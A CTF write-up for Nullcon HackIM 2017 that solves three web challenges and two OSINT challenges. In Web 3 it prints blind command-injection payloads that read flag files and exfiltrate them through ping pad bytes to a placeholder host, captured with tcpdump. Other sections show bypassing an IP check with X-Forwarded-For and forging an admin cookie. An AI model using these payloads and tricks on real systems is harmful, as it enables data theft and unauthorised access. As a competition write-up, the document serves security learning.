Nullcon HackIM 2017 CTF – Web

Web 1 | 100 Points

Question: Chris Martin wants to go home. Can you help him get there as soon as possible?http://54.152.19.210/web100/

Hints: There are no hint available in the question. but there are two hints provided as comment and errors.

Answer: I found a base64 hash “MmI0YjAzN2ZkMWYzMDM3NWU1Y2Q4NzE0NDhiNWI5NWM=” in source code as a HTML comment.

By decoding this I got a md5 hash and googled it !!!….Got username and password from a image. coldplay:paradise.

I entered this in login form and got some error like this “Mismatch in Host table!”. so the server is restricted with IP. In mean time I saw hint from @nullcon “There is no place like home”  lol…Its 127.0.0.1

Immediately I added X-Forwarded-For : 127.0.0.1 and got the flag.

Flag: flag{4f9361b0302d4c2f2eb1fc308587dfd6}


Web 2| 200 Points

Question: There are two kinds of people in this world. One with all the privileges and the others. Can you get the flag by eating some British biscuit?

http://54.152.19.210/web200/

Hints: British Biscuit….Cookie !!!

Answer: I created a user and logged in to the application….It was a limited user. We need to do something with the cookie as the hint was mentioning about cookie.

Cookies created by the application.

r – 351e766803d63c7ede8cb1e1c8db5e51c63fd47cff
u- 351e7668030bacc3ecaf25565435d10cc8bd094c49

In the above two cookie there is a similar string “351e766803”, by removing that I got two md5 and decryption it gives you clear understanding.

r – d63c7ede8cb1e1c8db5e51c63fd47cff – limited
u- 0bacc3ecaf25565435d10cc8bd094c49 – s4thi5h

I changed cookie value r into admin in md5 and got the admin page.

Flag : flag{bb6df1e39bd297a47ed0eeaea9cac7ee}


Web 3| 300 Points

Question: http://54.89.146.217/

Hints: CMD, Command Injection, I love my Ex. I also love Filterate.

Answer: Did some research on google using the hints and got this “Data Exfiltration via Blind OS Command Injection“,

The target is hardened with netcat, wget and CURL…The only way is ICMP ping. using that we can exfiltrate data in ICMP echo requests using the –p flag.  The –p flag allows you to specify up to 16 “pad” bytes. This is where we will store the data we want to exfiltrate.

These are the payloads I used to retrieve the flags.

cat /home/nullcon/flagpart1.txt | xxd -p -c 16 | while read exfil; do ping -p $exfil -c 1 xx.xx.xx.xx; done

cat /home/nullcon/flagpart2.txt | xxd -p -c 16 | while read exfil; do ping -p $exfil -c 1 xx.xx.xx.xx; done

 

In our server we need to capture traffic using tcpdump

tcpdump -A -s0 -i eth0 icmp

 

Flag: flag{0mgth4tsaniceflag}


 

Nullcon HackIM 2017 CTF – OSINT

OSINT 1 | 100 Points

 

Screenshot_3

Answer: Hints in questions are “I Serve”, “Clear Water”, “Fingerprint”

Clear Water is a City in Florida, First day I wasted in Google Maps as all the hints provided by them are related to google maps. I thought it may be a latitude/longitude…..I tried each and everything possibilities from google maps but no success.

 

Second day I got this tweet from @upgoingstar. He mentioned about infosec online tools and database.

Screenshot_26

 

I tried all the database including SHODAN.IO. That is the place.  ( Here we can relate the hints “I serve” with “What’s my fingerprint” ) Correct it may be a server running on Clear Water city.

Shodan.io is having city based search. It will list all the server running on the “clear water” and luckly only one server is running on clear water city. I checked the details and got the fingerprint.

Link: https://www.shodan.io/host/24.96.78.131

Screenshot_27

Flag: flag{ee:06:bb:c1:48:bc:64:bf:69:d3:ff:6f:b0:89:6a:84}


OSINT 2| 200 Points

Screenshot_1

osint200 (1)

 

Hints: “7033”, “I have a request”

We have one website and an image. I started with image content…Googled the number 7033 and got RFC 7033 webfinger protocol. In the RFC documentation page default request are mentioned (Hint: I have one request) I copied the request and tried in the target website. Boom. Got some information.

Screenshot_28 Screenshot_4

 

 

SSDEEP(523bd1e47b08cfd4d92cddcbff8e541d)
flag{ssdeep}

 

Answer: Here I trusted Google once again. I googled the hash and got this “ViCheck.ca – Malware Hash Index“.

Its a malware hash database. I searched the hash “523bd1e47b08cfd4d92cddcbff8e541d” and got ssdeep flag.

Screenshot_30

 

Flag : flag{3072:uFvAPdnvdoz91j/q2p4N1m1QmKoEe2TE4lvrNh:uFvAPdnvdoz91rq2p4rm1QdoEe2TE4l/}